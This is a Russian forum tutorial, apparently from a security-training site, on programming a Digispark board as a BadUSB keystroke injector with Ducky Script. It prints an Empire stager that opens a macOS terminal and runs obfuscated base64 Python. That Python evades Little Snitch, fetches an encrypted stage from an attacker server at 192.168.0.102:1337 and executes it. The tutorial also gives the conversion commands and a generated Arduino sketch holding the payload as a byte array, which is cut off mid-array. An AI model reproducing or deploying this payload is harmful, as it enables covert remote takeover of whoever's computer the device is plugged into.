• Познакомьтесь с пентестом веб-приложений на практике в нашем новом бесплатном курсе

    «Анализ защищенности веб-приложений»

    🔥 Записаться бесплатно!

  • CTF с учебными материалами Codeby Games

    Обучение кибербезопасности в игровой форме. Более 200 заданий по Active Directory, OSINT, PWN, Веб, Стеганографии, Реверс-инжинирингу, Форензике и Криптографии. Школа CTF с бесплатными курсами по всем категориям.

Статья Использование Ducky Script для программирования Digispark badusb

В прошлый раз я рассказал о Digispark - на столько же дешёвым, на сколько и неудачным, но всё же имеющем место быть клоне Rubber Ducky.
Оффициально Digi поддерживает только C++, но я бы хотел рассказать о костыле, позволяющем писать на весьма удобном и лаконичном Ducky Script, который предназначен для программирования Rubber Ducky.
Для примера я буду использовать Empire-пейлоад osx/ducky (подходит для всех unix), хотя можно делать и свои .duck скрипты.

Снимок экрана из 2017-09-01 12-05-11.png


Задаём файл для сохранения и генерируем

Снимок экрана из 2017-09-01 12-06-15.png


На выходе я получил такой ducky-script:
Код:
DELAY 1000
COMMAND SPACE
DELAY 1000
STRING TERMINAL
ENTER
DELAY 1000
STRING echo "import sys,base64,warnings;warnings.filterwarnings('ignore');exec(base64.b64decode('aW1wb3J0IHN5cztpbXBvcnQgcmUsIHN1YnByb2Nlc3M7Y21kID0gInBzIC1lZiB8IGdyZXAgTGl0dGxlXCBTbml0Y2ggfCBncmVwIC12IGdyZXAiCnBzID0gc3VicHJvY2Vzcy5Qb3BlbihjbWQsIHNoZWxsPVRydWUsIHN0ZG91dD1zdWJwcm9jZXNzLlBJUEUpCm91dCA9IHBzLnN0ZG91dC5yZWFkKCkKcHMuc3Rkb3V0LmNsb3NlKCkKaWYgcmUuc2VhcmNoKCJMaXR0bGUgU25pdGNoIiwgb3V0KToKICAgc3lzLmV4aXQoKQppbXBvcnQgdXJsbGliMjsKVUE9J01vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQ7IFRyaWRlbnQvNy4wOyBydjoxMS4wKSBsaWtlIEdlY2tvJztzZXJ2ZXI9J2h0dHA6Ly8xOTIuMTY4LjAuMTAyOjEzMzcnO3Q9Jy9uZXdzLnBocCc7cmVxPXVybGxpYjIuUmVxdWVzdChzZXJ2ZXIrdCk7CnJlcS5hZGRfaGVhZGVyKCdVc2VyLUFnZW50JyxVQSk7CnJlcS5hZGRfaGVhZGVyKCdDb29raWUnLCJzZXNzaW9uPWcyUVhrakpuN2gvT3NoOE1DWDdyVjZJR3hxUT0iKTsKcHJveHkgPSB1cmxsaWIyLlByb3h5SGFuZGxlcigpOwpvID0gdXJsbGliMi5idWlsZF9vcGVuZXIocHJveHkpOwp1cmxsaWIyLmluc3RhbGxfb3BlbmVyKG8pOwphPXVybGxpYjIudXJsb3BlbihyZXEpLnJlYWQoKTsKSVY9YVswOjRdO2RhdGE9YVs0Ol07a2V5PUlWKyc3YjI0YWZjOGJjODBlNTQ4ZDY2YzRlN2ZmNzIxNzFjNSc7UyxqLG91dD1yYW5nZSgyNTYpLDAsW10KZm9yIGkgaW4gcmFuZ2UoMjU2KToKICAgIGo9KGorU1tpXStvcmQoa2V5W2klbGVuKGtleSldKSklMjU2CiAgICBTW2ldLFNbal09U1tqXSxTW2ldCmk9aj0wCmZvciBjaGFyIGluIGRhdGE6CiAgICBpPShpKzEpJTI1NgogICAgaj0oaitTW2ldKSUyNTYKICAgIFNbaV0sU1tqXT1TW2pdLFNbaV0KICAgIG91dC5hcHBlbmQoY2hyKG9yZChjaGFyKV5TWyhTW2ldK1Nbal0pJTI1Nl0pKQpleGVjKCcnLmpvaW4ob3V0KSk='));" | python &
ENTER
DELAY 1000
Преобразуем .duck в юзабельный для Digi .ino
Теперь самое главное - конвертирование.
Копируем наш ducky-пейлоад в ранее скачанный duckencoder.
Сдесь мы преобразуем его в "сырой" режим:
[SIZE=4]python2 duckencoder.py -i unixhack.duck -o unixhack.bin[/SIZE]


Выделение_001.png


Примечание: автор говорит, что можно использовать функцию -l для автоматического выбора нужной раскладки. На практике же это не сработало.

Отлично, у нас есть код в сыром виде. Переместим его в папку duck2spark и выполним последние преобразования:
[SIZE=4]python2 duck2spark.py -i unixhack.bin -o unixhack.ino[/SIZE]

Выделение_002.png


Если попытаться скомпилировать сразу, то опять опять же столкнёмся с нехваткой памяти:

Выделение_004.png


По этому прийдётся урезать код, оставив нас без красивых мерцаний светодиодом по окончанию работы скрипта:
Код:
/*
* Sketch generated by duck2spark from Marcus Mengs aka MaMe82
*
*/
#include "DigiKeyboard.h"[/SIZE][/SIZE]

[SIZE=4][SIZE=4]#define DUCK_LEN 2810
const PROGMEM uint8_t duckraw [DUCK_LEN] = {
  0x0, 0xff, 0x0, 0xff, 0x0, 0xff, 0x0, 0xeb, 0x2c, 0x8, 0x0, 0xff, 0x0, 0xff, 0x0, 0xff, 0x0, 0xeb, 0x17, 0x2, 0x8, 0x2, 0x15, 0x2, 0x10, 0x2, 0xc, 0x2, 0x11, 0x2, 0x4, 0x2, 0xf, 0x2, 0x28, 0x0, 0x0, 0xff, 0x0, 0xff, 0x0, 0xff, 0x0, 0xeb, 0x8, 0x0, 0x6, 0x0, 0xb, 0x0, 0x12, 0x0, 0x2c, 0x0, 0x34, 0x2, 0xc, 0x0, 0x10, 0x0, 0x13, 0x0, 0x12, 0x0, 0x15, 0x0, 0x17, 0x0, 0x2c, 0x0, 0x16, 0x0, 0x1c, 0x0, 0x16, 0x0, 0x36, 0x0, 0x5, 0x0, 0x4, 0x0, 0x16, 0x0, 0x8, 0x0, 0x23, 0x0, 0x21, 0x0, 0x36, 0x0, 0x1a, 0x0, 0x4, 0x0, 0x15, 0x0, 0x11, 0x0, 0xc, 0x0, 0x11, 0x0, 0xa, 0x0, 0x16, 0x0, 0x33, 0x0, 0x1a, 0x0, 0x4, 0x0, 0x15, 0x0, 0x11, 0x0, 0xc, 0x0, 0x11, 0x0, 0xa, 0x0, 0x16, 0x0, 0x37, 0x0, 0x9, 0x0, 0xc, 0x0, 0xf, 0x0, 0x17, 0x0, 0x8, 0x0, 0x15, 0x0, 0x1a, 0x0, 0x4, 0x0, 0x15, 0x0, 0x11, 0x0, 0xc, 0x0, 0x11, 0x0, 0xa, 0x0, 0x16, 0x0, 0x26, 0x2, 0x34, 0x0, 0xc, 0x0, 0xa, 0x0, 0x11, 0x0, 0x12, 0x0, 0x15, 0x0, 0x8, 0x0, 0x34, 0x0, 0x27, 0x2, 0x33, 0x0, 0x8, 0x0, 0x1b, 0x0, 0x8, 0x0, 0x6, 0x0, 0x26, 0x2, 0x5, 0x0, 0x4, 0x0, 0x16, 0x0, 0x8, 0x0, 0x23, 0x0, 0x21, 0x0, 0x37, 0x0, 0x5, 0x0, 0x23, 0x0, 0x21, 0x0, 0x7, 0x0, 0x8, 0x0, 0x6, 0x0, 0x12, 0x0, 0x7, 0x0, 0x8, 0x0, 0x26, 0x2, 0x34, 0x0, 0x4, 0x0, 0x1a, 0x2, 0x1e, 0x0, 0x1a, 0x0, 0x5, 0x0, 0x20, 0x0, 0xd, 0x2, 0x27, 0x0, 0xc, 0x2, 0xb, 0x2, 0x11, 0x2, 0x22, 0x0, 0x6, 0x0, 0x1d, 0x0, 0x17, 0x0, 0x13, 0x0, 0x5, 0x0, 0x1b, 0x2, 0x5, 0x2, 0x19, 0x0, 0x6, 0x0, 0x11, 0x0, 0x14, 0x2, 0xa, 0x0, 0x6, 0x0, 0x10, 0x0, 0x18, 0x2, 0x16, 0x0, 0xc, 0x2, 0xb, 0x2, 0x11, 0x2, 0x1e, 0x0, 0x1c, 0x2, 0x11, 0x0, 0x5, 0x2, 0x1c, 0x0, 0x5, 0x0, 0x1f, 0x0, 0x11, 0x2, 0xf, 0x0, 0x6, 0x0, 0x20, 0x0, 0x10, 0x2, 0x24, 0x0, 0x1c, 0x2, 0x1f, 0x0, 0x1e, 0x0, 0xe, 0x0, 0xc, 0x2, 0x7, 0x2, 0x27, 0x0, 0xa, 0x0, 0xc, 0x2, 0x11, 0x0, 0x5, 0x2, 0x1d, 0x0, 0xc, 0x2, 0x6, 0x2, 0x1e, 0x0, 0xf, 0x0, 0x1d, 0x2, 0xc, 0x0, 0x5, 0x2, 0x25, 0x0, 0xc, 0x2, 0xa, 0x2, 0x7, 0x0, 0x1c, 0x0, 0x1d, 0x2, 0x1b, 0x2, 0x4, 0x2, 0xa, 0x0, 0x17, 0x2, 0xa, 0x2, 0xf, 0x0, 0x27, 0x0, 0x7, 0x0, 0xa, 0x2, 0x1b, 0x0, 0xf, 0x0, 0x1b, 0x2, 0x6, 0x2, 0x5, 0x2, 0x17, 0x2, 0x5, 0x0, 0x10, 0x0, 0xf, 0x0, 0x27, 0x0, 0x1c, 0x2, 0x1f, 0x0, 0xa, 0x0, 0xa, 0x0, 0x9, 0x0, 0x6, 0x2, 0x5, 0x2, 0x11, 0x0, 0x6, 0x0, 0x10, 0x0, 0x19, 0x2, 0x1a, 0x0, 0xc, 0x2, 0x6, 0x2, 0x1e, 0x0, 0x1f, 0x0, 0xc, 0x2, 0xa, 0x2, 0x7, 0x0, 0x1c, 0x0, 0x1d, 0x2, 0x1b, 0x2, 0x4, 0x2, 0xc, 0x0, 0x6, 0x2, 0x11, 0x0, 0x5, 0x2, 0x1d, 0x0, 0xc, 0x2, 0x7, 0x2, 0x27, 0x0, 0xa, 0x0, 0x6, 0x0, 0x20, 0x0, 0x19, 0x2, 0xc, 0x0, 0x6, 0x0, 0xb, 0x2, 0xd, 0x2, 0x19, 0x0, 0x1c, 0x2, 0x1f, 0x0, 0x19, 0x2, 0x1d, 0x0, 0x6, 0x0, 0x1c, 0x0, 0x22, 0x0, 0x14, 0x2, 0x5, 0x0, 0x20, 0x0, 0x5, 0x2, 0xf, 0x0, 0x5, 0x0, 0xc, 0x0, 0xb, 0x0, 0xd, 0x0, 0x5, 0x0, 0x1a, 0x2, 0x14, 0x2, 0x16, 0x0, 0xc, 0x2, 0xb, 0x2, 0x11, 0x2, 0x12, 0x0, 0x1d, 0x2, 0x1a, 0x2, 0x1b, 0x0, 0x16, 0x0, 0x13, 0x2, 0x19, 0x2, 0x15, 0x2, 0x1c, 0x0, 0x7, 0x0, 0x1a, 0x2, 0x18, 0x2, 0x16, 0x0, 0xc, 0x2, 0xb, 0x2, 0x11, 0x2, 0x27, 0x0, 0x1d, 0x2, 0xa, 0x2, 0x26, 0x0, 0x1e, 0x0, 0x7, 0x0, 0x7, 0x2, 0x1e, 0x0, 0x1d, 0x0, 0x7, 0x0, 0x1a, 0x2, 0xd, 0x2, 0x1a, 0x0, 0x6, 0x0, 0x10, 0x0, 0x26, 0x0, 0xd, 0x0, 0x1d, 0x2, 0x1b, 0x2, 0x11, 0x2, 0x1d, 0x0, 0xf, 0x2, 0xf, 0x0, 0x5, 0x2, 0xd, 0x2, 0x18, 0x2, 0x8, 0x2, 0x18, 0x2, 0x13, 0x0, 0x6, 0x2, 0x10, 0x0, 0x26, 0x0, 0x1e, 0x0, 0x7, 0x0, 0x6, 0x2, 0x4, 0x2, 0x26, 0x0, 0xc, 0x2, 0xb, 0x2, 0x5, 0x2, 0x1d, 0x0, 0xf, 0x2, 0x11, 0x0, 0x11, 0x2, 0x27, 0x0, 0x1d, 0x2, 0xa, 0x2, 0x26, 0x0, 0x1e, 0x0, 0x7, 0x0, 0x6, 0x2, 0x22, 0x0, 0x1c, 0x0, 0x1d, 0x2, 0x1a, 0x2, 0x9, 0x2, 0xe, 0x0, 0xe, 0x2, 0x6, 0x2, 0xe, 0x0, 0xe, 0x2, 0x6, 0x0, 0xb, 0x2, 0x10, 0x2, 0x18, 0x0, 0x6, 0x0, 0x20, 0x0, 0x15, 0x2, 0xe, 0x0, 0x5, 0x0, 0x20, 0x0, 0x19, 0x2, 0x27, 0x0, 0xf, 0x2, 0x10, 0x0, 0x11, 0x2, 0x16, 0x0, 0x5, 0x0, 0x20, 0x0, 0x11, 0x2, 0xf, 0x0, 0xe, 0x2, 0x6, 0x2, 0xe, 0x0, 0xe, 0x2, 0x4, 0x0, 0x1a, 0x2, 0x1c, 0x2, 0xa, 0x0, 0x6, 0x0, 0x10, 0x0, 0x18, 0x2, 0x18, 0x0, 0x6, 0x0, 0x1f, 0x0, 0x19, 0x2, 0xb, 0x0, 0x6, 0x0, 0x10, 0x0, 0x11, 0x2, 0x12, 0x0, 0xe, 0x2, 0x6, 0x2, 0xd, 0x2, 0x10, 0x2, 0x4, 0x0, 0x1b, 0x2, 0x15, 0x2, 0x27, 0x0, 0x5, 0x0, 0xa, 0x2, 0x18, 0x2, 0xa, 0x0, 0x18, 0x2, 0x1f, 0x0, 0x22, 0x0, 0x13, 0x0, 0x7, 0x0, 0xa, 0x2, 0x11, 0x2, 0x12, 0x0, 0xc, 0x2, 0xc, 0x0, 0x1a, 0x0, 0xa, 0x0, 0x5, 0x0, 0x20, 0x0, 0x19, 0x2, 0x27, 0x0, 0xe, 0x2, 0x17, 0x2, 0x12, 0x0, 0xe, 0x2, 0xc, 0x2, 0x6, 0x2, 0x4, 0x2, 0xa, 0x0, 0x6, 0x0, 0x20, 0x0, 0xf, 0x0, 0x1d, 0x0, 0xf, 0x2, 0x10, 0x0, 0x19, 0x2, 0x21, 0x0, 0x4, 0x0, 0x1b, 0x2, 0x14, 0x2, 0x12, 0x0, 0xe, 0x2, 0x14, 0x2, 0x13, 0x0, 0x13, 0x0, 0x5, 0x0, 0x1b, 0x2, 0x5, 0x2, 0x19, 0x0, 0x6, 0x0, 0x11, 0x0, 0x14, 0x2, 0xa, 0x0, 0x7, 0x0, 0x1b, 0x2, 0xd, 0x2, 0x16, 0x0, 0x5, 0x0, 0xa, 0x2, 0xf, 0x0, 0xc, 0x0, 0x10, 0x2, 0xd, 0x0, 0x16, 0x0, 0xe, 0x2, 0x19, 0x2, 0x18, 0x2, 0x8, 0x2, 0x26, 0x0, 0xd, 0x2, 0x27, 0x0, 0x1e, 0x0, 0x19, 0x0, 0x8, 0x0, 0x10, 0x0, 0xf, 0x0, 0x16, 0x0, 0x5, 0x0, 0xa, 0x2, 0x8, 0x2, 0x19, 0x0, 0x11, 0x2, 0x16, 0x2, 0x21, 0x0, 0x1a, 0x0, 0xc, 0x2, 0x6, 0x2, 0xb, 0x0, 0x1b, 0x2, 0x4, 0x0, 0x1a, 0x2, 0x22, 0x0, 0xe, 0x0, 0x5, 0x0, 0x20, 0x0, 0x7, 0x0, 0x1d, 0x0, 0xc, 0x2, 0x8, 0x2, 0x22, 0x0, 0x18, 0x2, 0xc, 0x2, 0x7, 0x2, 0x1c, 0x2, 0x18, 0x0, 0x10, 0x2, 0x17, 0x2, 0x16, 0x0, 0xa, 0x0, 0x19, 0x2, 0x27, 0x0, 0x26, 0x0, 0x1b, 0x2, 0x11, 0x2, 0xd, 0x0, 0x14, 0x2, 0x24, 0x0, 0xc, 0x2, 0x9, 0x2, 0x15, 0x2, 0x1c, 0x0, 0x4, 0x0, 0x1a, 0x2, 0x15, 0x2, 0xf, 0x0, 0x5, 0x0, 0x11, 0x0, 0x14, 0x2, 0x19, 0x0, 0x11, 0x2, 0x1c, 0x0, 0x21, 0x0, 0x1a, 0x0, 0x12, 0x2, 0x1c, 0x0, 0x5, 0x2, 0x1c, 0x0, 0x7, 0x0, 0xd, 0x0, 0x12, 0x0, 0x1b, 0x0, 0x10, 0x2, 0x16, 0x2, 0x21, 0x0, 0x1a, 0x0, 0xe, 0x2, 0x16, 0x2, 0x5, 0x2, 0x16, 0x0, 0x4, 0x0, 0x1a, 0x2, 0x17, 0x0, 0xf, 0x0, 0xc, 0x2, 0x8, 0x2, 0x7, 0x0, 0xf, 0x0, 0x1c, 0x2, 0x1f, 0x0, 0x17, 0x0, 0x19, 0x0, 0xd, 0x2, 0x1d, 0x0, 0x17, 0x0, 0x1d, 0x0, 0x1d, 0x2, 0x1b, 0x2, 0xd, 0x2, 0x1f, 0x0, 0x1d, 0x2, 0x1b, 0x2, 0xc, 0x2, 0x26, 0x0, 0xd, 0x2, 0x1f, 0x0, 0xb, 0x0, 0x27, 0x0, 0x7, 0x0, 0xb, 0x2, 0x4, 0x2, 0x23, 0x0, 0xf, 0x2, 0x1c, 0x0, 0x25, 0x0, 0x1b, 0x0, 0x12, 0x2, 0x17, 0x2, 0xc, 0x2, 0x18, 0x0, 0x10, 0x2, 0x17, 0x2, 0x1c, 0x2, 0x21, 0x0, 0xf, 0x2, 0xd, 0x0, 0x4, 0x2, 0x18, 0x0, 0x10, 0x2, 0x17, 0x2, 0x4, 0x2, 0x1c, 0x0, 0x12, 0x2, 0xd, 0x0, 0x8, 0x2, 0x1d, 0x0, 0x10, 0x2, 0x1d, 0x0, 0x6, 0x0, 0x11, 0x0, 0x12, 0x2, 0x20, 0x0, 0x14, 0x2, 0x26, 0x0, 0xd, 0x2, 0x1c, 0x0, 0x26, 0x0, 0x18, 0x0, 0x1d, 0x2, 0x1b, 0x2, 0x7, 0x0, 0x1d, 0x0, 0xf, 0x2, 0x11, 0x0, 0x5, 0x2, 0x12, 0x0, 0x6, 0x0, 0x6, 0x2, 0x6, 0x0, 0x24, 0x0, 0x6, 0x0, 0x10, 0x0, 0x19, 0x2, 0x1b, 0x0, 0x13, 0x2, 0x1b, 0x2, 0x19, 0x2, 0x1c, 0x0, 0x5, 0x0, 0xa, 0x2, 0x1b, 0x0, 0x13, 0x0, 0x1c, 0x2, 0xd, 0x0, 0xc, 0x2, 0x18, 0x0, 0x18, 0x2, 0x10, 0x0, 0x19, 0x2, 0x1b, 0x0, 0x7, 0x0, 0x1a, 0x2, 0x19, 0x2, 0x1d, 0x0, 0x7, 0x0, 0x6, 0x2, 0xb, 0x0, 0x1d, 0x0, 0x1d, 0x2, 0x1b, 0x2, 0xd, 0x2, 0x1f, 0x0, 0x1d, 0x2, 0x1b, 0x2, 0xc, 0x2, 0x15, 0x0, 0x7, 0x0, 0x6, 0x2, 0xe, 0x0, 0x24, 0x0, 0x6, 0x2, 0x11, 0x0, 0xd, 0x2, 0xf, 0x0, 0x6, 0x0, 0x16, 0x2, 0x22, 0x0, 0xb, 0x0, 0x1d, 0x2, 0xa, 0x2, 0x15, 0x2, 0x9, 0x0, 0x4, 0x0, 0xa, 0x2, 0x19, 0x2, 0xb, 0x0, 0x1d, 0x2, 0xa, 0x2, 0x19, 0x2, 0x1c, 0x0, 0xe, 0x2, 0x6, 0x2, 0x7, 0x0, 0x19, 0x2, 0x6, 0x0, 0x1f, 0x0, 0x19, 0x2, 0x1c, 0x0, 0xf, 0x2, 0x18, 0x2, 0x9, 0x2, 0x11, 0x0, 0x1d, 0x2, 0x1a, 0x2, 0x22, 0x0, 0x27, 0x0, 0xd, 0x2, 0x1c, 0x0, 0x1b, 0x0, 0x19, 0x2, 0x14, 0x2, 0x16, 0x2, 0xe, 0x0, 0x24, 0x0, 0x6, 0x2, 0x11, 0x0, 0xd, 0x2, 0xf, 0x0, 0x6, 0x0, 0x16, 0x2, 0x22, 0x0, 0xb, 0x0, 0x1d, 0x2, 0xa, 0x2, 0x15, 0x2, 0x9, 0x0, 0x4, 0x0, 0xa, 0x2, 0x19, 0x2, 0xb, 0x0, 0x1d, 0x2, 0xa, 0x2, 0x19, 0x2, 0x1c, 0x0, 0xe, 0x2, 0x6, 0x2, 0x7, 0x0, 0x7, 0x2, 0x5, 0x0, 0x1f, 0x0, 0x26, 0x0, 0x15, 0x0, 0x4, 0x0, 0x1a, 0x2, 0x18, 0x2, 0x11, 0x0, 0xf, 0x2, 0x6, 0x2, 0xd, 0x2, 0x1d, 0x0, 0x1d, 0x2, 0x1b, 0x2, 0x11, 0x2, 0x1d, 0x0, 0x4, 0x0, 0x1a, 0x2, 0x26, 0x0, 0x18, 0x0, 0x13, 0x2, 0x1a, 0x2, 0x6, 0x0, 0x1c, 0x0, 0x18, 0x2, 0x19, 0x2, 0xb, 0x0, 0x15, 0x0, 0x4, 0x0, 0xe, 0x0, 0x13, 0x0, 0x18, 0x0, 0x11, 0x2, 0x1f, 0x0, 0xa, 0x0, 0x19, 0x0, 0x17, 0x2, 0x20, 0x0, 0x11, 0x2, 0x12, 0x0, 0x12, 0x2, 0x8, 0x2, 0x1e, 0x0, 0x7, 0x2, 0x1a, 0x2, 0x7, 0x2, 0x7, 0x0, 0x1c, 0x0, 0x19, 0x2, 0xd, 0x0, 0x1d, 0x2, 0xd, 0x2, 0x15, 0x2, 0x20, 0x0, 0xb, 0x0, 0x1b, 0x0, 0x18, 0x2, 0x17, 0x2, 0x27, 0x0, 0xc, 0x0, 0xe, 0x2, 0x17, 0x2, 0x16, 0x0, 0xe, 0x2, 0x6, 0x0, 0xb, 0x2, 0xd, 0x2, 0x19, 0x0, 0x8, 0x0, 0xb, 0x2, 0xe, 0x0, 0xa, 0x0, 0x13, 0x2, 0x16, 0x2, 0x5, 0x2, 0x1e, 0x0, 0x6, 0x0, 0x10, 0x0, 0x1b, 0x0, 0x16, 0x0, 0x4, 0x0, 0x1a, 0x2, 0xc, 0x2, 0x1c, 0x0, 0xf, 0x2, 0xf, 0x0, 0x5, 0x2, 0x1c, 0x0, 0x5, 0x0, 0x20, 0x0, 0xb, 0x0, 0x22, 0x0, 0x16, 0x2, 0xa, 0x2, 0x9, 0x2, 0x18, 0x0, 0x1d, 0x2, 0xa, 0x2, 0x1b, 0x0, 0xf, 0x0, 0x6, 0x0, 0xc, 0x0, 0xa, 0x0, 0x13, 0x0, 0x12, 0x2, 0x1a, 0x0, 0x13, 0x0, 0x19, 0x0, 0xc, 0x2, 0x7, 0x2, 0x27, 0x0, 0xa, 0x0, 0x7, 0x0, 0x1b, 0x2, 0xd, 0x2, 0x16, 0x0, 0x5, 0x0, 0xa, 0x2, 0xf, 0x0, 0xc, 0x0, 0x10, 0x2, 0xc, 0x0, 0x22, 0x0, 0xc, 0x0, 0x7, 0x0, 0x1a, 0x2, 0xf, 0x0, 0x16, 0x0, 0x1d, 0x2, 0x9, 0x2, 0x26, 0x0, 0x19, 0x0, 0x6, 0x0, 0xa, 0x2, 0x19, 0x2, 0x18, 0x0, 0x1d, 0x2, 0x1b, 0x2, 0xc, 0x2, 0x12, 0x0, 0x6, 0x0, 0xb, 0x2, 0xd, 0x2, 0x19, 0x0, 0x8, 0x0, 0xb, 0x2, 0xe, 0x0, 0x13, 0x0, 0x12, 0x2, 0x1a, 0x0, 0x13, 0x0, 0x1e, 0x0, 0x6, 0x0, 0x10, 0x0, 0x1b, 0x0, 0x16, 0x0, 0x4, 0x0, 0x1a, 0x2, 0xc, 0x2, 0x1c, 0x0, 0xf, 0x2, 0x10, 0x0, 0xf, 0x0, 0x18, 0x0, 0x6, 0x0, 0x20, 0x0, 0x15, 0x2, 0xb, 0x0, 0x5, 0x0, 0xa, 0x2, 0x1b, 0x0, 0x9, 0x0, 0x5, 0x0, 0x20, 0x0, 0x5, 0x2, 0xf, 0x0, 0x5, 0x0, 0x10, 0x0, 0x19, 0x2, 0x1c, 0x0, 0xe, 0x2, 0xa, 0x2, 0x25, 0x0, 0x13, 0x0, 0x12, 0x2, 0x1a, 0x0, 0x13, 0x0, 0xb, 0x0, 0x13, 0x2, 0x1b, 0x2, 0x19, 0x2, 0x1c, 0x0, 0x5, 0x0, 0xa, 0x2, 0x1b, 0x0, 0x13, 0x0, 0x1c, 0x2, 0xd, 0x0, 0xc, 0x2, 0x18, 0x0, 0x7, 0x0, 0x1b, 0x2, 0xd, 0x2, 0x16, 0x0, 0x5, 0x0, 0x20, 0x0, 0x5, 0x2, 0xf, 0x0, 0x5, 0x0, 0xc, 0x0, 0xb, 0x0, 0x1c, 0x0, 0x1d, 0x2, 0x1b, 0x2, 0x8, 0x2, 0x13, 0x0, 0xf, 0x2, 0x11, 0x0, 0xd, 0x2, 0xf, 0x0, 0x1c, 0x2, 0x1a, 0x2, 0x14, 0x2, 0x12, 0x0, 0xe, 0x2, 0x17, 0x2, 0x16, 0x0, 0xe, 0x2, 0x16, 0x2, 0x19, 0x2, 0x1c, 0x2, 0x26, 0x0, 0x1c, 0x2, 0x19, 0x2, 0x16, 0x0, 0x1a, 0x0, 0x12, 0x2, 0xd, 0x0, 0x15, 0x2, 0x7, 0x0, 0x12, 0x2, 0x1f, 0x0, 0x15, 0x2, 0xb, 0x0, 0x7, 0x0, 0xa, 0x2, 0x8, 0x2, 0x26, 0x0, 0x1c, 0x2, 0x19, 0x2, 0x16, 0x0, 0x27, 0x0, 0x12, 0x2, 0xf, 0x0, 0x27, 0x0, 0x24, 0x0, 0x4, 0x0, 0x1f, 0x0, 0x19, 0x2, 0x22, 0x0, 0x13, 0x2, 0x18, 0x2, 0xf, 0x0, 0x1a, 0x2, 0xe, 0x2, 0x1c, 0x0, 0x6, 0x0, 0x20, 0x0, 0x1c, 0x2, 0xd, 0x0, 0xc, 0x2, 0x27, 0x0, 0x1c, 0x2, 0x1a, 0x2, 0x1d, 0x2, 0xd, 0x0, 0x12, 0x2, 0xa, 0x2, 0xd, 0x2, 0xd, 0x0, 0x12, 0x2, 0x7, 0x2, 0x5, 0x2, 0xf, 0x0, 0x11, 0x2, 0x17, 0x2, 0x14, 0x2, 0x21, 0x0, 0x1d, 0x2, 0x7, 0x2, 0x1c, 0x2, 0x1f, 0x0, 0x1c, 0x2, 0x1d, 0x0, 0x15, 0x2, 0xf, 0x0, 0x11, 0x2, 0x1f, 0x0, 0x1d, 0x2, 0x10, 0x0, 0x11, 0x2, 0x1d, 0x0, 0xc, 0x2, 0x1b, 0x0, 0x11, 0x2, 0x1d, 0x0, 0x9, 0x2, 0xd, 0x0, 0x11, 0x2, 0x16, 0x2, 0x6, 0x0, 0x24, 0x0, 0x18, 0x2, 0x1c, 0x0, 0x1b, 0x0, 0x14, 0x0, 0xf, 0x2, 0xa, 0x2, 0x26, 0x0, 0x1e, 0x0, 0x7, 0x0, 0x7, 0x2, 0x1e, 0x0, 0x1c, 0x0, 0x1c, 0x2, 0x1a, 0x2, 0x22, 0x0, 0x11, 0x0, 0x1d, 0x2, 0x16, 0x2, 0xa, 0x0, 0x1c, 0x0, 0x11, 0x2, 0x17, 0x2, 0x1c, 0x2, 0x13, 0x0, 0xf, 0x2, 0x7, 0x2, 0x4, 0x2, 0x16, 0x0, 0x1a, 0x2, 0x1e, 0x0, 0x27, 0x0, 0xe, 0x2, 0x1d, 0x2, 0x10, 0x0, 0x26, 0x0, 0x1c, 0x0, 0xc, 0x2, 0xa, 0x2, 0xe, 0x0, 0xa, 0x0, 0x4, 0x0, 0x1a, 0x2, 0x21, 0x0, 0xa, 0x0, 0x6, 0x0, 0x10, 0x0, 0x9, 0x2, 0x18, 0x0, 0x1d, 0x2, 0x1f, 0x0, 0x18, 0x2, 0x12, 0x0, 0x10, 0x2, 0xd, 0x0, 0x18, 0x2, 0x1f, 0x0, 0xe, 0x2, 0x17, 0x2, 0x12, 0x0, 0xe, 0x2, 0xc, 0x2, 0x6, 0x2, 0x4, 0x2, 0xa, 0x0, 0xc, 0x2, 0xa, 0x2, 0x12, 0x0, 0x26, 0x0, 0xe, 0x2, 0xa, 0x2, 0x12, 0x0, 0x15, 0x0, 0x18, 0x2, 0x1e, 0x0, 0x17, 0x0, 0x13, 0x0, 0x1b, 0x2, 0x16, 0x2, 0x17, 0x0, 0x19, 0x0, 0x6, 0x0, 0x10, 0x0, 0x14, 0x2, 0x12, 0x0, 0x4, 0x0, 0x1f, 0x0, 0x19, 0x2, 0x22, 0x0, 0x1a, 0x2, 0x1f, 0x0, 0xe, 0x0, 0xf, 0x0, 0x5, 0x0, 0xa, 0x2, 0x19, 0x2, 0x18, 0x0, 0xe, 0x2, 0xa, 0x2, 0x17, 0x0, 0xf, 0x0, 0x8, 0x0, 0x16, 0x2, 0xf, 0x0, 0x7, 0x0, 0xe, 0x2, 0x16, 0x2, 0xe, 0x0, 0xf, 0x0, 0x10, 0x2, 0xd, 0x0, 0x18, 0x2, 0x1f, 0x0, 0x6, 0x2, 0xc, 0x0, 0x4, 0x2, 0xa, 0x0, 0xc, 0x2, 0x6, 0x2, 0x5, 0x2, 0x17, 0x2, 0x1a, 0x2, 0x1f, 0x0, 0xf, 0x0, 0x7, 0x0, 0xf, 0x2, 0x9, 0x2, 0x11, 0x2, 0x5, 0x0, 0x4, 0x0, 0xf, 0x0, 0x27, 0x0, 0x26, 0x0, 0x18, 0x2, 0x1e, 0x0, 0x17, 0x0, 0x14, 0x0, 0x1b, 0x2, 0x16, 0x2, 0x1b, 0x0, 0x17, 0x2, 0x1a, 0x2, 0x1f, 0x0, 0xf, 0x0, 0x7, 0x0, 0x6, 0x2, 0x10, 0x0, 0xe, 0x0, 0x26, 0x0, 0x4, 0x0, 0xd, 0x0, 0x27, 0x0, 0x1a, 0x0, 0x6, 0x2, 0x10, 0x0, 0x1d, 0x2, 0x19, 0x0, 0x6, 0x0, 0xc, 0x0, 0x5, 0x2, 0xd, 0x0, 0x4, 0x0, 0xa, 0x2, 0x9, 0x2, 0x1c, 0x0, 0xc, 0x2, 0xa, 0x2, 0xf, 0x0, 0x18, 0x0, 0xc, 0x2, 0xa, 0x2, 0x15, 0x2, 0xb, 0x0, 0x7, 0x0, 0xa, 0x2, 0x8, 0x2, 0x23, 0x0, 0x6, 0x2, 0xc, 0x0, 0x4, 0x2, 0xa, 0x0, 0xc, 0x2, 0x6, 0x2, 0x5, 0x2, 0x13, 0x0, 0x13, 0x2, 0x16, 0x2, 0xb, 0x0, 0x13, 0x0, 0xe, 0x2, 0x1d, 0x0, 0x8, 0x2, 0x13, 0x0, 0xd, 0x2, 0x17, 0x2, 0xc, 0x2, 0x1e, 0x0, 0x11, 0x2, 0xa, 0x0, 0x12, 0x0, 0xa, 0x0, 0xc, 0x2, 0x6, 0x2, 0x4, 0x2, 0xa, 0x0, 0x4, 0x0, 0xd, 0x0, 